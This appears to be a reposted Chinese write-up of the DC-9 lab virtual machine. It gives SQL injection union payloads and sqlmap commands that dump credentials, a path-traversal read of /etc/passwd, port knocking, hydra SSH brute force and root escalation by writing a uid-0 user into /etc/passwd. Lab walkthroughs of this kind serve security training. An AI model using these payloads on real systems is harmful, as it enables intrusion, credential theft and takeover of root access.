DC-9靶机
Posted bingtang123
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DC-9靶机相关的知识,希望对你有一定的参考价值。
仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-9.zip
一、主机扫描
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-4822bde14a059e6a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、信息收集
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-79cd99900419a13f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-269dd0a817f3d4e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-6900f645d9a416d8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-a75e7d30bd1c3c11.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-a267383d972c5715.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、漏洞查找和利用
发现search的地方可能有sql注入
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-b5f6808286f95111.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-6d3af1809025973b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
1‘ union select 1,2,3,4,5,6#
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-279d9324ebc26a68.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-8ceee82011ed8115.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
-1‘ union select 1,2,3,4,5,database()--+
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-f97b1cb8f366f567.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
-1‘union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema = database()#
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-c98ddd040131b55d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
-1‘ union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘Users‘#
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-cd30ed5776578521.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
-1‘ union select 1,2,3,4,5,group_concat(UserID,Username,Password)from Users#
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-1e4709c7d5293b43.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用sqlmap
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-988e0bd39c0ffff9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
sqlmap -r 1.txt --dbs
sqlmap -r 1.txt -D users --tables
sqlmap -r 1.txt -D users -T UserDetails --columns
sqlmap -r 1 .txt -D users -T UserDetails --dump
sqlmap -r 1.txt -D Staff--tables
sqlmap -r 1.txt -D Staff -T Users --columns
sqlmap -r 1.txt -D Staff -T Users -C Password,UserID,Username –-dump
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-e04e87b46f4d4f8c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-dafba85608520a9a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-600311653b00afff.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
transorbital1
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-9cf29a26c7e76b71.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.17.136/manage.php?file=../../../../etc/passwd
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-2c3f796d6223952f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
没有爆破到
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-f9671fe01721f42d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
信息收集 发现ssh端口为filtered 百度
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-9ee61b0825ca2a29.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
这个knockd.conf是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中,也可以直接用nc敲击端口。
http://192.168.17.136/manage.php?file=../../../../etc/knockd.conf
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-52b75daba247a851.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看该文件,我们需要依次敲击 7469 8475 9842 端口实现敲门操作
nc 192.169.17.136 7469
nc 192.169.17.136 8475
nc 192.169.17.136 9842
或者
nmap -p 7469 192.168.17.136
nmap -p 8475 192.168.17.136
nmap -p 9842 192.168.17.136
nmap -p22 192.168.17.136
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-05a600310da29dbd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
hydra -L 1.txt -P 2.txt ssh://192.168.17.136
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-d01faf5e4d3b5a01.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
得到密码
login: chandlerb password: UrAG0D!
login: janitor password: Ilovepeepee
login: joeyt password: Passw0rd
login: fredf password: B4-Tru3-001
登录信息收集
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-a4bd926f7b24854b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-fb32609be7c044d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用find命令找到该文件,查看源代码
find / -name"test.py"2>/dev/null
cat /opt/devstuff/test.py
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-a7fa109b3aebdde0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
百度创个账户
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-9315947ae4dd3b34.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
openssl passwd -1 -salt au 123456
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-296528225113730f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
echo‘au:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash‘>> /tmp/au
sudo ./test/tmp/au /etc/passwd然后运行test脚本,切换到au用户,成功得到root权限
su au
123456
![技术图片](https://upload-images.jianshu.io/upload_images/4664072-60f3537eefb0e2bb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
以上是关于DC-9靶机的主要内容,如果未能解决你的问题,请参考以下文章